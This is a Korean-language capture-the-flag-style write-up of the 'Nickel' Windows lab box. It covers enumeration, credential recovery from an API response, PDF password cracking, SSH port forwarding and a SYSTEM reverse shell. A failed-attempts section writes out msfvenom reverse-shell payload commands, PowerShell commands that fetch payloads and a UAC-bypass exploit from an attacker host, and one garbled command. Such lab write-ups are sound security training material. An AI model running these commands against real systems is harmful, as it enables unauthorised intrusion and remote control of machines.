36. Nickel (GET TO WORK) - Windows (pdfcrack, ssh-port-forward, scp 파일 전송)
1. Enumeration
: Port Scan
![](https://blog.kakaocdn.net/dn/brbQG6/btrK1pPlR5Y/1x7Q2SW8xGSDh3uZkWwjFk/img.png)
> domain name : nickel
: web enum
![](https://blog.kakaocdn.net/dn/cmrENw/btrK6PL19hc/oBP63AaVnBH3WTI8aw5SIK/img.png)
> 메뉴 호출 시 반응이 없는데
응답 패킷을 살펴보면
![](https://blog.kakaocdn.net/dn/bezzYw/btrK5awzVFb/AmM3XOlDEkkIs2GdOAR7PK/img.png)
> 33333 포트에서 호출
: 33333에서 확인
![](https://blog.kakaocdn.net/dn/DYMRt/btrK5awzVH3/CUWPCfG1kjdwVSXaKCEkE1/img.png)
![](https://blog.kakaocdn.net/dn/bYVXrt/btrK6QYsVjV/X7hFOdL5xeGIzoS5KxGkN1/img.png)
> GET 메서드 사용 x
2. Exploitation
> POST 메서드로 요청을 시도하면
![](https://blog.kakaocdn.net/dn/qkIfY/btrK6cgoigw/6AQkHCKk3K1a1mSMzTCKKK/img.png)
> 정상 호출 가능하고
System Idel Process 확인 가능 +
사용자 정보 확인이 가능한데
![](https://blog.kakaocdn.net/dn/cFQhts/btrK2nqcnnw/BFWb3DjKrWae5T5a2RC6u0/img.png)
> 위 정보로는 로그인이 불가
: base64 방식으로 디코딩을 시도해 보면
![](https://blog.kakaocdn.net/dn/di1LSQ/btrK4C1vkDA/8SKYq49HxmM1dW7ATe7Ly1/img.png)
> 암호 확인!
: 로그인을 시도하면
![](https://blog.kakaocdn.net/dn/7pfcS/btrK5FpBU66/ZrWS6JtNR0OAxhEzyYA7ok/img.png)
침투 성공!
3. Privilege Escalation
: directory searching
![](https://blog.kakaocdn.net/dn/brBAGF/btrLaV7drXP/aYI5yYhL27CVQp4qTyABlk/img.png)
> pdf 파일 확인
> pdf 다운로드
방법 1) ftp
ftp> bin
ftp> get Infrastructure.pdf
또는
ftp> bin
ftp> recv Infrastructure.pdf
![](https://blog.kakaocdn.net/dn/bmjY82/btrLa4bU6hi/kTOhsJDNm747m5kR6vd1Qk/img.png)
방법 2) scp
# scp ariah@192.168.120.209:C:\\users\\ariah\\desktop\\payload.exe /root/PG/20
![](https://blog.kakaocdn.net/dn/cEzr55/btrLcJZgg3n/7xZog3YySb18Kp2gof18E1/img.png)
![](https://blog.kakaocdn.net/dn/cOYmX5/btrLb5hbamu/vbXd51i3f7lGMFWTFCVL00/img.png)
> scp로 받아온 뒤 확인해 보면
![](https://blog.kakaocdn.net/dn/pjMp2/btrK9yyhFLM/C2EOO6nqyzOcFB9S1NJCdK/img.png)
> 암호 필요
: pdf 크랙 (pdfcrack)
![](https://blog.kakaocdn.net/dn/cG12XG/btrLcIlLtKW/YJWXEyLMtPuuuDpOts6CxK/img.png)
![](https://blog.kakaocdn.net/dn/blA6In/btrLalrG0mb/0kA8LjopRzfTxgCxq31ml0/img.png)
> password 확인
: pdf 내용 확인
![](https://blog.kakaocdn.net/dn/rLc9a/btrK91mP4xV/VdDKlKxh5k1XF7jvW8rGsK/img.png)
> 임시 커맨드 엔드 포인트
> 포트 스캔할 때는 80 포트 검색이 안되었음
: 실행 중인 네트워크 확인
![](https://blog.kakaocdn.net/dn/E7RFQ/btrLa3KPMP1/lKkratzsS76HgakLW4NEX1/img.png)
> 80 포트 활성화 확인
: ssh port forwarding
![](https://blog.kakaocdn.net/dn/bhqccZ/btrLchojPqa/acakOaluODGvDN0ayNCIok/img.png)
> 로컬 7979 호출 시
상대방 80으로 붙는다
: 포트 포워딩 후 명령어 수행 시
![](https://blog.kakaocdn.net/dn/bBJBOg/btrLaC02BfP/IKJKxsl653BW1kpfn3JEYk/img.png)
> 정상 반영되고 (시스템 권한으로 커맨드 실행 가능)
포트 포워딩 없이 로컬에서 바로 작업도 가능
![](https://blog.kakaocdn.net/dn/RGGyh/btrLcI68LEu/QpTMI7UVIZH1z1AJ8kZcO0/img.png)
: 리버스 쉘
![](https://blog.kakaocdn.net/dn/c4F8jk/btrK9zcVh3Y/0A7rOTEDwhLqkLWkjCmkUk/img.png)
> 명령어를 입력하려면 url 인코딩이 필요하고
![](https://blog.kakaocdn.net/dn/nrk2e/btrLcIlLtGX/RGiEmkeZ8LePSqWFNxRGTk/img.png)
> 리스너 기동 후 파일 실행 시
(리버스 쉘 생성은 아래 실패 try에 기재함)
![](https://blog.kakaocdn.net/dn/N6ehI/btrLaVGaWmt/42b8WfJa21dkqnkBRBd78K/img.png)
![](https://blog.kakaocdn.net/dn/ce883g/btrLauB3sUe/93E5mQOv7UsKBxhOj4JAX1/img.png)
끝
-실패 try-
: 권한 확인
![](https://blog.kakaocdn.net/dn/cdqC2C/btrK3WMEl2e/aRb4sFD9KC0rZFtzHKdGC0/img.png)
> SeChangeNotifyPrivilege Enable
: PsExec.exe + reverse.exe + Strings64.exe + eventvwr.exe + exploit
1) reverse shell payload 생성 및 동작 실험
: 생성
#x86
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.148 LPORT 443 --format exe -o reverse.exe
#x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.148 LPORT 443 --format exeerse.ex#e
![](https://blog.kakaocdn.net/dn/mLbG7/btrK6dfiwb7/3uoSDcFBfhNphkEnAxcsZK/img.png)
: 실험
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.148/reverse.exe', 'c:\Users\ariah\reverse.exe');
![](https://blog.kakaocdn.net/dn/cMzTMd/btrK4TWc1Ph/bkHSeGUcbKT8honZ6tytqK/img.png)
![](https://blog.kakaocdn.net/dn/bX33ME/btrK48ljhne/VvdWZyQd0VKtcEZWSCgTD1/img.png)
2) 나머지 파일 download :
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.148/PsExec.exe', 'c:\Users\ariah\ps.exe');
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.148/strings64.exe', 'c:\Users\ariah\str64.exe');
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.148/eventvwr.exe', 'c:\Users\ariah\event.exe');
: psexec 실험
![](https://blog.kakaocdn.net/dn/cszKbW/btrK1iJsGz3/fynF7SW8tRwfQYkiTn3KWK/img.png)
> access is denied.
3) Strings64 command :
str64.exe -accepteula C:\Windows\System32\eventvwr.exe | findstr /i autoelevate
<autoElevate>true</autoElevate> 확인
![](https://blog.kakaocdn.net/dn/czu8zN/btrK4V7xdoM/PvnnIMavrFlsk1dYrlcOwK/img.png)
4) Exploits download :
https://github.com/turbo/zero2hero/blob/master/main.c
> uncomment + payload 파일명 변환
![](https://blog.kakaocdn.net/dn/B5k9i/btrK1h4SLVA/z3d2nT0jkvi0T2JvrCNZQk/img.png)
5) Compile the exploits :
x86_64-w64-mingw32-gcc main.c -o eventvwr_bypass_64.exe
![](https://blog.kakaocdn.net/dn/kJ61f/btrK4WZI2N7/MIA1gQuaJTdvmZHMpJPIAK/img.png)
6) File download :
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.148/eventvwr_bypass_64.exe', 'c:\Users\ariah\eventvwr.exe');
![](https://blog.kakaocdn.net/dn/2rm1q/btrK48FCxdi/nzTQhmfBtVcVh28Ao6KN5K/img.png)
7) Execute new eventvwr.exe
: 실행 안됨 - 실패
8) 새로운 쉘 획득 후 권한 확인
: 실패
9) PsExec.exe 재실행 :
: 당연히 안됨
-실패 try 종료 -
: